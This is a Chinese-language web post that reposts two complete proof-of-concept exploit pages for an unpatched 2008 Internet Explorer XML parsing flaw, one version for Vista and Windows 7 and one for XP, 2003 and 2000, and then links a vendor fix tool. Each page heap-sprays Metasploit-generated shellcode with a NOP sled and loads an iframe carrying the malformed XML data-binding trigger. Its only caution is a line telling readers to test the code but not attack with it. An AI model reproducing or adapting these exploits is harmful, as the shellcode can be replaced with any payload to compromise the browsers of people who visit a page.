微軟IE最新XML漏洞利用代碼,目前微軟尚未發布修復該漏洞的補丁,大家可利用如下代碼進行測試,但請勿用於攻擊
適用於Vista操作系統的代碼(Vista/SERVER 2008/Windows 7):
1 1. <Html>
2 2. <script>
3 3.
4 4. // k`sOSe 12/10/2008
5 5. // Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
6 6. // Heap spray address adjusted for Vista - muts / offensive-security.com
7 7. // http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
8 8. // http://www.offensive-security.com/0day/iesploit-vista.rar
9 9. // Windows/exec - 141 bytes
10 10. // http://www.metasploit.com
11 11. // EXITFUNC=seh, CMD=C:Windowssystem32calc.exe
12 12. var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
13 13. var block = unescape("%u0c0c%u0c0c");
14 14. var nops = unescape("%u9090%u9090%u9090");
15 15.
16 16.
17 17. while (block.length < 81920) block += block;
18 18. var memory = new Array();
19 19. var i=0;
20 20. for (;i<1000;i++) memory[i] += (block + nops + shellcode);
21 21.
22 22. document.write("<iframe src="iframe.Html">");
23 23.
24 24. </script>
25 25.
26 26.
27 27. </Html>
28 28.
29 29.
30 30. <!-- iframe.Html
31 31.
32 32. <XML ID=I>
33 33. <X>
34 34. <C>
35 35. <![CDATA[
36 36. <image
37 37. SRC=http://ఌఌ.xxxxx.org
38 38. >
39 39. ]]>
40 40.
41 41. </C>
42 42. </X>
43 43. </XML>
44 44.
45 45. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=Html>
46 46. <XML ID=I>
47 47. </XML>
48 48.
49 49. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=Html>
50 50. </SPAN>
51 51. </SPAN>
52 52.
53 53. -->
54
適用於Windows舊版本操作系統的代碼(XP/2003/2000等):
1 1. IE-sploit.Html
2 2. <Html>
3 3. <script>
4 4.
5 5. // k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13
6 6.
7 7. // Windows/exec - 141 bytes
8 8. // http://www.metasploit.com
9 9. // EXITFUNC=seh, CMD=C:Windowssystem32calc.exe
10 10. var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
11 11. var block = unescape("%u0a0a%u0a0a");
12 12. var nops = unescape("%u9090%u9090%u9090");
13 13.
14 14.
15 15. while (block.length < 81920) block += block;
16 16. var memory = new Array();
17 17. var i=0;
18 18. for (;i<1000;i++) memory[i] += (block + nops + shellcode);
19 19.
20 20. document.write("<iframe src="iframe.Html">");
21 21.
22 22. </script>
23 23.
24 24.
25 25. </Html>
26 26.
27 27. iframe.Html
28 28. <XML ID=I>
29 29. <X>
30 30. <C>
31 31. <![CDATA[
32 32. <image
33 33. SRC=http://ਊਊ.xxxxx.org
34 34. >
35 35. ]]>
36 36.
37 37. </C>
38 38. </X>
39 39. </XML>
40 40.
41 41. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=Html>
42 42. <XML ID=I>
43 43. </XML>
44 44. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=Html>
45 45. </SPAN>
46 46. </SPAN>
47
目前微軟尚未對該漏洞發布相應的補丁,我們如何對該漏洞進行防范呢,360安全衛士推出了一款修復工具可以對該漏洞進行修復,修復工具下載地址為http://dl.360safe.com/360fixmsxml.exe。